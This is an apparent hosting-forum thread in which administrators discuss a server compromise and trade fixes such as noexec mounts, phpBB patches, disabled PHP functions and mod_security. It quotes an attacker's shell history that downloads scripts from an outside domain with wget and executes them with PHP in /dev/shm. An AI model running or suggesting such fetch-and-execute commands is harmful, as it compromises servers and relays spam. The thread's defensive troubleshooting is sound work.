tmp shm hack
This is from .bash_history in /tmp. Any idea how to stop this???
Thanks,Code:cd /dev/shm ls mkdir st ls cd st wget promocoesnatal.com/enviar.txt wget promocoesnatal.com/cinema.htm wget promocoesnatal.com/lista04.txt ls php -q enviar.txt lista04.txt cinema.htm
Michael
you could try disabling /tmp execution powers. there is a tutorial on that at http://webhostgear.com
+P 6145153533
+eMail nikk.spiert[@]gmail.com
+AIM IAEtheral
he said they are going to /dev/shm not /tmp
Search the apache logs, someone is running a vulnerable script.
there was a phpbb vulnerability via which u could use wget... mayb it can also be the case. check at:
=================================
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
=================================
cPanel Certified Specialist
http://www.admin-ahead.com
https://ticketforge.com
AIM: tux image Skype: admin-ahead
In my php.ini I've entered the following functions to the disabled list and stoped that exploit cold.
The phpBB fix was also implemented, but just changing the php.ini with those values stoped the problem immediatly.
disable_functions = readfile, system, passthru ; This directive allows you to disable certain
;functions for security reasons. It receives
; a comma separated list of function names.
; This directive is *NOT* affected by whether
; Safe Mode is turned on or off.
I strongly suggest modifying your php.ini to have those entries.
-Alon.
enviar.txt
I cannot believe this is the only post on this - this has happened multiple times and some new hole gets discovered after we have closed the "existing" one - maybe people just don't it's happening to them? If you are blackholed and you are not a spammer maybe this is while - maybe if you aren't like me and don't get root mail and suddenly get blasted with thousands of rejects from the (words I will not post on what these people are) "jerks" who do this to send their spam through your server - alerting us to the fact that it has "happened" again.
I searched for enviar.txt and this is the only thing returned - so if there are more threads - please point me their way
My tech partner used the fix that is in this small post after this started again yesterday - and lo and behold it happened again this morning.
If someone has TRULY successfully stopped this I would appreciate knowing - other than disallowing wget entirely on the server (which I use because I'm on dialup in the boonies and it kills my productive time having to upload and download) - I would love to know.
I'm sure not a vindicitve person, nor one who wishes harm to others, but I can honestly say - if anyone figures out a way to blow these people's computers out when they hack and steal from others - I'd love to see it - I'd sell tickets and popcorn.
There are plenty of threads, it's more a matter of searching for the right thing. You're most likely being compromised through a vulnerable PHP script. So, search these forums to learn how to:
1. Make sure that you have all of your phpBB forums upgraded to v2.13
2. Install mod_security and use a strong set of filters
3. Mount /dev/shm noexec,nosuid
4. Make sure that you have a firewall installed (iptables if you're on Linux)
5. Clean your server if it has been compromised and check for rookit exploits
6. Make sure that you're running php v4.3.10 and if possble enable phpsuexec
You can get all that information from the forums and/or you can hire someone to do them for you if you don't have the time.
Jonathan Michaelson
Need your cPanel servers secured and tuned?
cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
http://www.configserver.com
Thank you Chirpy
I searched for enviar.txt - since that is the common thread I've seen - but thank you - I'll look and see what I can find.
LinkBack URL
About LinkBacks
Reply With Quote